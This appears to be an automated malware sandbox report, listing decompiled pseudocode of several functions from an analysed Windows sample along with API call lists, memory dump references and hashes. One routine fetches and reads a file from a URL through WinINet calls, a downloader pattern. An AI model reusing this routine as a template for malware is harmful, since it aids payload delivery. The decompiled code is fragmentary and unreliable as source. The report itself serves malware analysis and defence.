                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x11c)) != 1) {
                                                                                                                                                                                                                            					_t121 =  *__eax;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t121 + 0x14)) = 0x77;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t121 + 0x18)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t121 + 0x1c)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)( *__eax + 4))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t106 =  *_t182 + 0x18;
                                                                                                                                                                                                                            				 *_t106 = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t106 + 4)) = 0;
                                                                                                                                                                                                                            				 *(_t106 + 8) =  *(_t182 + 0x120) & 0x0000ffff;
                                                                                                                                                                                                                            				 *(_t106 + 0xc) =  *(_t182 + 0x122) & 0x0000ffff;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t106 + 0x10)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t182 + 0x14)) = 0x57;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            				if(( *(_t124 + 0xc) |  *(_t124 + 0xd)) != 0) {
                                                                                                                                                                                                                            					_t118 =  *_t182;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t118 + 0x14)) = 0x5a;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t118 + 0x18)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t118 + 0x1c)) = 0;
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t181 = _t180 - 0xe;
                                                                                                                                                                                                                            				if(_t181 != 0) {
                                                                                                                                                                                                                            					_t115 =  *_t182;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t115 + 0x14)) = 0x58;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t115 + 0x18)) = _t181;
                                                                                                                                                                                                                            					return  *((intOrPtr*)( *_t182 + 4))();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            0x0046b35b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046b362
                                                                                                                                                                                                                            0x0046b445

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: F$J$J$X$X
                                                                                                                                                                                                                            • API String ID: 0-2166313073
                                                                                                                                                                                                                            • Opcode ID: 12fdb1c193f4f78136981c133ba371dc7561109d75048bcbb9abb70116e7edbf
                                                                                                                                                                                                                            • Instruction ID: 33befd47d124d4f0be4a324bfdbb371183624d475779f292e62bfdc109e5000d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12fdb1c193f4f78136981c133ba371dc7561109d75048bcbb9abb70116e7edbf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB714E706042808FD718CF29C4946A6BFE1EF5A304F19C0DAD8898F367D77AD985CB96
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E00474D50(void* __eax, void* __ebx, intOrPtr __edx, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				void _v1060;
                                                                                                                                                                                                                            				char _v1392;
                                                                                                                                                                                                                            				char _v1856;
                                                                                                                                                                                                                            				DWORD* _t57;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = _t73;
                                                                                                                                                                                                                            				_t74 = _t73 + 0xfffff8c4;
                                                                                                                                                                                                                            				_v1856 = 0;
                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t70 = __eax;
                                                                                                                                                                                                                            				_t57 =  &_v24;
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x474f77);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				E00402B68(0,  &_v1856);
                                                                                                                                                                                                                            				E00409E18(_v1856,  &_v28);
                                                                                                                                                                                                                            				_v16 = InternetOpenA(E00404E80(_v28), 0, 0, 0, 0);
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x474e92);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				_v20 = InternetOpenUrlA(_v16, E00404E80(_t70), 0, 0, 0x84000000, 0);
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				_push(0x474e74);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t74;
                                                                                                                                                                                                                            				E00402F1C( &_v1392, _v8, 0);
                                                                                                                                                                                                                            				E004028C4(E004035E4());
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					InternetReadFile(_v20,  &_v1060, 0x400, _t57);
                                                                                                                                                                                                                            					E004028C4(E0040306C(0));
                                                                                                                                                                                                                            				} while ( *_t57 != 0);
                                                                                                                                                                                                                            				E004028C4(E0040308C( &_v1392));
                                                                                                                                                                                                                            				_v9 = 1;
                                                                                                                                                                                                                            				_pop(_t68);
                                                                                                                                                                                                                            				 *[fs:eax] = _t68;
                                                                                                                                                                                                                            				_push(0x474e7b);
                                                                                                                                                                                                                            				return InternetCloseHandle(_v20);
                                                                                                                                                                                                                            			}





















APIs
  • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
• InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
• InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
• InternetCloseHandle.WININET(?), ref: 00474E6E
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: Internet$FileOpen$CloseHandleModuleNameRead
• String ID:
• API String ID: 1785656124-0
• Opcode ID: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
• Instruction ID: 9dd8df19d1045a063bc6dcad90270211b168fb7c8f28217f7d4554014ce166d6
• Opcode Fuzzy Hash: 258ed6f4a337dd00b29ed6c0571024dd33be25b5071fc36f155e22a10198ec8f
• Instruction Fuzzy Hash: 8D318670A00218ABDB11DFA5DC52BAEB7B8EB48704F91447AF504B72C1D7786A00CF68
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00435BD4(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t34 = __eax;
                                                                                                                                                                                                                            				_push(_t37);
                                                                                                                                                                                                                            				_push(0x435c51);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t37;
                                                                                                                                                                                                                            				E00435634(__eax);
                                                                                                                                                                                                                            				_t25 = GetTickCount();
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					Sleep(0);
                                                                                                                                                                                                                            				} while (GetTickCount() - _t25 <= 0x3e8);
                                                                                                                                                                                                                            				E00435234(_t34, _t25,  &_v8, 0, __edi, _t34);
                                                                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                                                                            					_t20 = E00404E80(_v8);
                                                                                                                                                                                                                            					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t30);
                                                                                                                                                                                                                            				 *[fs:eax] = _t30;
                                                                                                                                                                                                                            				_push(0x435c58);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}










APIs
  • Part of subcall function 00435634: WinHelpA.USER32 ref: 00435643
• GetTickCount.KERNEL32 ref: 00435BF2
• Sleep.KERNEL32(00000000,00000000,00435C51,?,?,00000000,00000000,?,00435BCA), ref: 00435BFB
• GetTickCount.KERNEL32 ref: 00435C00
• WinHelpA.USER32 ref: 00435C36
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID: CountHelpTick$Sleep
• String ID:
• API String ID: 2438605093-0
• Opcode ID: cdb3f0a47abc97e9ab8d290f2c7d69f339f0985d3f4200dd5a8a68ef50c0141f
• Instruction ID: 40ece7025a35593bf5630c28b5397b8871db868c6d8e528fc1fd908e9dcdadfb
• Opcode Fuzzy Hash: cdb3f0a47abc97e9ab8d290f2c7d69f339f0985d3f4200dd5a8a68ef50c0141f
• Instruction Fuzzy Hash: 8701A270A04604AFE711EBAACC53B1EB3A8DB4C708F6155BBF500A62C1DA7CAD01855A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0045E9EC(void* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                            				intOrPtr _t154;
                                                                                                                                                                                                                            				signed int _t160;
                                                                                                                                                                                                                            				int _t163;
                                                                                                                                                                                                                            				int _t168;
                                                                                                                                                                                                                            				signed int _t172;
                                                                                                                                                                                                                            				int _t173;
                                                                                                                                                                                                                            				int _t183;
                                                                                                                                                                                                                            				int _t188;
                                                                                                                                                                                                                            				int _t198;
                                                                                                                                                                                                                            				int _t202;
                                                                                                                                                                                                                            				int _t206;
                                                                                                                                                                                                                            				void* _t217;
                                                                                                                                                                                                                            				void* _t221;
                                                                                                                                                                                                                            				void* _t225;
                                                                                                                                                                                                                            				void* _t257;
                                                                                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                                                                                            				intOrPtr _t306;
                                                                                                                                                                                                                            				struct _ITEMIDLIST** _t307;
                                                                                                                                                                                                                            				intOrPtr* _t309;
                                                                                                                                                                                                                            				void* _t312;
                                                                                                                                                                                                                            				void* _t318;
                                                                                                                                                                                                                            				void* _t319;
                                                                                                                                                                                                                            				void* _t320;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v280 = 0;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_t309 = __edx;
                                                                                                                                                                                                                            				_t257 = __eax;
                                                                                                                                                                                                                            				_push(_t312);
                                                                                                                                                                                                                            				_push(0x45ef62);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t312 + 0xfffffee0;
                                                                                                                                                                                                                            				_t306 =  *__edx;
                                                                                                                                                                                                                            				if(_t306 !=  *((intOrPtr*)(__eax + 0xd2))) {
                                                                                                                                                                                                                            					_push( *(__edx + 8));
                                                                                                                                                                                                                            					_push( *(__edx + 4));
                                                                                                                                                                                                                            					_push(_t306);
                                                                                                                                                                                                                            					_t154 =  *((intOrPtr*)(__eax + 0xda));
                                                                                                                                                                                                                            					_push(_t154);
                                                                                                                                                                                                                            					L00407540();
                                                                                                                                                                                                                            					 *((intOrPtr*)(__edx + 0xc)) = _t154;
                                                                                                                                                                                                                            					goto L80;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t160 =  *(__edx + 8);
                                                                                                                                                                                                                            					_v8 = _t160 & 0x7fffffff;
                                                                                                                                                                                                                            					_v9 = (_t160 & 0x80000000) != 0;
                                                                                                                                                                                                                            					_t307 =  *(__edx + 4);
                                                                                                                                                                                                                            					if( *_t307 != 0) {
                                                                                                                                                                                                                            						__eflags = _v8 - 0x40000;
                                                                                                                                                                                                                            						if(_v8 != 0x40000) {
                                                                                                                                                                                                                            							_t163 = SHGetPathFromIDList( *_t307,  &_v276);
                                                                                                                                                                                                                            							__eflags = _t163;
                                                                                                                                                                                                                            							if(_t163 != 0) {
                                                                                                                                                                                                                            								E0040A174( &_v276,  &_v16);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E004049C0( &_v16);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							asm("fild dword [eax]");
                                                                                                                                                                                                                            							asm("fldln2");
                                                                                                                                                                                                                            							asm("fxch st0, st1");
                                                                                                                                                                                                                            							asm("fyl2x");
                                                                                                                                                                                                                            							[tword [ebp-0x120] = __fp0;
                                                                                                                                                                                                                            							asm("wait");
                                                                                                                                                                                                                            							asm("fldln2");
                                                                                                                                                                                                                            							asm("fxch st0, st1");
                                                                                                                                                                                                                            							asm("fyl2x");
                                                                                                                                                                                                                            							asm("fdivrp st1, st0");
                                                                                                                                                                                                                            							E00402C20();
                                                                                                                                                                                                                            							asm("adc edx, 0x0");
                                                                                                                                                                                                                            							E00404BA8();
                                                                                                                                                                                                                            							E00404CCC( &_v16, 0x45ef84, _v280);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E004049C0( &_v16);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t307[1] != 0) {
                                                                                                                                                                                                                            						_t168 = SHGetPathFromIDList(_t307[1],  &_v276);
                                                                                                                                                                                                                            						__eflags = _t168;
                                                                                                                                                                                                                            						if(_t168 != 0) {
                                                                                                                                                                                                                            							E0040A174( &_v276,  &_v20);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E004049C0( &_v20);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E004049C0( &_v20);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t318 =  *(_t257 + 0xde) - _v8;
                                                                                                                                                                                                                            					if(_t318 != 0) {
                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                            						_t172 = _v8;
                                                                                                                                                                                                                            						_t319 = _t172 - 0x400;
                                                                                                                                                                                                                            						if(_t319 > 0) {
                                                                                                                                                                                                                            							__eflags = _t172 - 0x8000;
                                                                                                                                                                                                                            							if(__eflags > 0) {
                                                                                                                                                                                                                            								_t173 = _t172 - 0x10000;
                                                                                                                                                                                                                            								__eflags = _t173;
                                                                                                                                                                                                                            								if(_t173 == 0) {
                                                                                                                                                                                                                            									__eflags =  *((short*)(_t257 + 0x5c));
                                                                                                                                                                                                                            									if( *((short*)(_t257 + 0x5c)) != 0) {
                                                                                                                                                                                                                            										 *((intOrPtr*)(_t257 + 0x5a))(_v9);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t183 = _t173 - 0x10000;
                                                                                                                                                                                                                            									__eflags = _t183;
                                                                                                                                                                                                                            									if(_t183 == 0) {
                                                                                                                                                                                                                            										__eflags =  *((short*)(_t257 + 0x9c));
                                                                                                                                                                                                                            										if( *((short*)(_t257 + 0x9c)) != 0) {
                                                                                                                                                                                                                            											 *((intOrPtr*)(_t257 + 0x9a))(_v9, _v20);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t188 = _t183 - 0x20000;
                                                                                                                                                                                                                            										__eflags = _t188;
                                                                                                                                                                                                                            										if(_t188 == 0) {
                                                                                                                                                                                                                            											__eflags =  *((short*)(_t257 + 0x6c));
                                                                                                                                                                                                                            											if( *((short*)(_t257 + 0x6c)) != 0) {
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t257 + 0x6a))(_v9);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											__eflags = _t188 == 0x7fc0000;
                                                                                                                                                                                                                            											if(_t188 == 0x7fc0000) {
                                                                                                                                                                                                                            												__eflags =  *((short*)(_t257 + 0x34));
                                                                                                                                                                                                                            												if( *((short*)(_t257 + 0x34)) != 0) {
                                                                                                                                                                                                                            													 *((intOrPtr*)(_t257 + 0x32))();
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                            									__eflags =  *((short*)(_t257 + 0xc4));
                                                                                                                                                                                                                            									if( *((short*)(_t257 + 0xc4)) != 0) {
                                                                                                                                                                                                                            										 *((intOrPtr*)(_t257 + 0xc2))(_v9);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t198 = _t172 - 0x800;
                                                                                                                                                                                                                            									__eflags = _t198;
                                                                                                                                                                                                                            									if(_t198 == 0) {
                                                                                                                                                                                                                            										__eflags =  *((short*)(_t257 + 0x3c));
                                                                                                                                                                                                                            										if( *((short*)(_t257 + 0x3c)) != 0) {
                                                                                                                                                                                                                            											 *((intOrPtr*)(_t257 + 0x3a))(_v9);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t202 = _t198 - 0x800;
                                                                                                                                                                                                                            										__eflags = _t202;
                                                                                                                                                                                                                            										if(_t202 == 0) {
                                                                                                                                                                                                                            											__eflags =  *((short*)(_t257 + 0xbc));
                                                                                                                                                                                                                            											if( *((short*)(_t257 + 0xbc)) != 0) {
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t257 + 0xba))(_v9);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t206 = _t202 - 0x1000;
                                                                                                                                                                                                                            											__eflags = _t206;
                                                                                                                                                                                                                            											if(_t206 == 0) {
                                                                                                                                                                                                                            												__eflags =  *((short*)(_t257 + 0xcc));
                                                                                                                                                                                                                            												if( *((short*)(_t257 + 0xcc)) != 0) {
                                                                                                                                                                                                                            													 *((intOrPtr*)(_t257 + 0xca))(_v9);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eflags = _t206 == 0x2000;
                                                                                                                                                                                                                            												if(_t206 == 0x2000) {
                                                                                                                                                                                                                            													__eflags =  *((short*)(_t257 + 0xb4));
                                                                                                                                                                                                                            													if( *((short*)(_t257 + 0xb4)) != 0) {
                                                                                                                                                                                                                            														 *((intOrPtr*)(_t257 + 0xb2))(_v9);
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L78;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t319 == 0) {
                                                                                                                                                                                                                            							__eflags =  *((short*)(_t257 + 0x94));
                                                                                                                                                                                                                            							if( *((short*)(_t257 + 0x94)) != 0) {
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t257 + 0x92))(_v9);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L78;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t320 = _t172 - 0x20;
                                                                                                                                                                                                                            						if(_t320 > 0) {
                                                                                                                                                                                                                            							_t217 = _t172 - 0x40;
                                                                                                                                                                                                                            							if(_t217 == 0) {
                                                                                                                                                                                                                            								__eflags =  *((short*)(_t257 + 0x7c));
                                                                                                                                                                                                                            								if( *((short*)(_t257 + 0x7c)) != 0) {
                                                                                                                                                                                                                            									 *((intOrPtr*)(_t257 + 0x7a))(_v9);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t221 = _t217 - 0x40;
                                                                                                                                                                                                                            								if(_t221 == 0) {
                                                                                                                                                                                                                            									__eflags =  *((short*)(_t257 + 0x64));
                                                                                                                                                                                                                            									if( *((short*)(_t257 + 0x64)) != 0) {
                                                                                                                                                                                                                            										 *((intOrPtr*)(_t257 + 0x62))(_v9);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t225 = _t221 - 0x80;
                                                                                                                                                                                                                            									if(_t225 == 0) {
                                                                                                                                                                                                                            										__eflags =  *((short*)(_t257 + 0x54));
                                                                                                                                                                                                                            										if( *((short*)(_t257 + 0x54)) != 0) {
                                                                                                                                                                                                                            											 *((intOrPtr*)(_t257 + 0x52))(_v9);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										if(_t225 == 0x100) {
                                                                                                                                                                                                                            											__eflags =  *((short*)(_t257 + 0x8c));
                                                                                                                                                                                                                            											if( *((short*)(_t257 + 0x8c)) != 0) {
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t257 + 0x8a))(_v9);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L78;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t320 == 0) {
                                                                                                                                                                                                                            							__eflags =  *((short*)(_t257 + 0x74));
                                                                                                                                                                                                                            							if( *((short*)(_t257 + 0x74)) != 0) {
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t257 + 0x72))(_v9);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L78;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t172 > 0x10) {
                                                                                                                                                                                                                            							goto L78;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						switch( *((intOrPtr*)(_t172 * 4 +  &M0045EB75))) {
                                                                                                                                                                                                                            							case 0:
                                                                                                                                                                                                                            								goto L78;
                                                                                                                                                                                                                            							case 1:
                                                                                                                                                                                                                            								__eflags =  *((short*)(__ebx + 0xa4));
                                                                                                                                                                                                                            								if( *((short*)(__ebx + 0xa4)) != 0) {
                                                                                                                                                                                                                            									__eax = _v20;
                                                                                                                                                                                                                            									_push(__eax);
                                                                                                                                                                                                                            									_push(__eax);
                                                                                                                                                                                                                            									__ecx = _v16;
                                                                                                                                                                                                                            									__edx = __ebx;
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0xa6));
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0xa2))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L78;
                                                                                                                                                                                                                            							case 2:
                                                                                                                                                                                                                            								__eflags =  *((short*)(__ebx + 0x44));
                                                                                                                                                                                                                            								if( *((short*)(__ebx + 0x44)) != 0) {
                                                                                                                                                                                                                            									_push(__eax);
                                                                                                                                                                                                                            									__ecx = _v16;
                                                                                                                                                                                                                            									__edx = __ebx;
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0x46));
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0x42))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L78;
                                                                                                                                                                                                                            							case 3:
                                                                                                                                                                                                                            								__eflags =  *((short*)(__ebx + 0x4c));
                                                                                                                                                                                                                            								if( *((short*)(__ebx + 0x4c)) != 0) {
                                                                                                                                                                                                                            									_push(__eax);
                                                                                                                                                                                                                            									__ecx = _v16;
                                                                                                                                                                                                                            									__edx = __ebx;
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0x4e));
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0x4a))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L78;
                                                                                                                                                                                                                            							case 4:
                                                                                                                                                                                                                            								__eflags =  *((short*)(__ebx + 0x84));
                                                                                                                                                                                                                            								if( *((short*)(__ebx + 0x84)) != 0) {
                                                                                                                                                                                                                            									_push(__eax);
                                                                                                                                                                                                                            									__ecx = _v16;
                                                                                                                                                                                                                            									__edx = __ebx;
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0x86));
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0x82))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L78;
                                                                                                                                                                                                                            							case 5:
                                                                                                                                                                                                                            								__eflags =  *((short*)(__ebx + 0xac));
                                                                                                                                                                                                                            								if( *((short*)(__ebx + 0xac)) != 0) {
                                                                                                                                                                                                                            									_push(__eax);
                                                                                                                                                                                                                            									__ecx = _v16;
                                                                                                                                                                                                                            									__edx = __ebx;
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0xae));
                                                                                                                                                                                                                            									__eax =  *((intOrPtr*)(__ebx + 0xaa))();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L78;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404DCC( *((intOrPtr*)(_t257 + 0xe2)), _v16);
                                                                                                                                                                                                                            						if(_t318 != 0) {
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E00404DCC( *((intOrPtr*)(_t257 + 0xe6)), _v20);
                                                                                                                                                                                                                            						if(_t318 == 0) {
                                                                                                                                                                                                                            							L78:
                                                                                                                                                                                                                            							 *(_t257 + 0xde) = _v8;
                                                                                                                                                                                                                            							E00404A14(_t257 + 0xe2, _v16);
                                                                                                                                                                                                                            							E00404A14(_t257 + 0xe6, _v20);
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t309 + 0xc)) = 0;
                                                                                                                                                                                                                            							L80:
                                                                                                                                                                                                                            							_pop(_t278);
                                                                                                                                                                                                                            							 *[fs:eax] = _t278;
                                                                                                                                                                                                                            							_push(0x45ef69);
                                                                                                                                                                                                                            							E004049C0( &_v280);
                                                                                                                                                                                                                            							return E004049E4( &_v20, 2);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                            0x0045eeb0
                                                                                                                                                                                                                            0x0045eeb0
                                                                                                                                                                                                                            0x0045ec05
                                                                                                                                                                                                                            0x0045ec05
                                                                                                                                                                                                                            0x0045ec05
                                                                                                                                                                                                                            0x0045ec0a
                                                                                                                                                                                                                            0x0045eed9
                                                                                                                                                                                                                            0x0045eee1
                                                                                                                                                                                                                            0x0045eef2
                                                                                                                                                                                                                            0x0045eef2
                                                                                                                                                                                                                            0x0045ec10
                                                                                                                                                                                                                            0x0045ec10
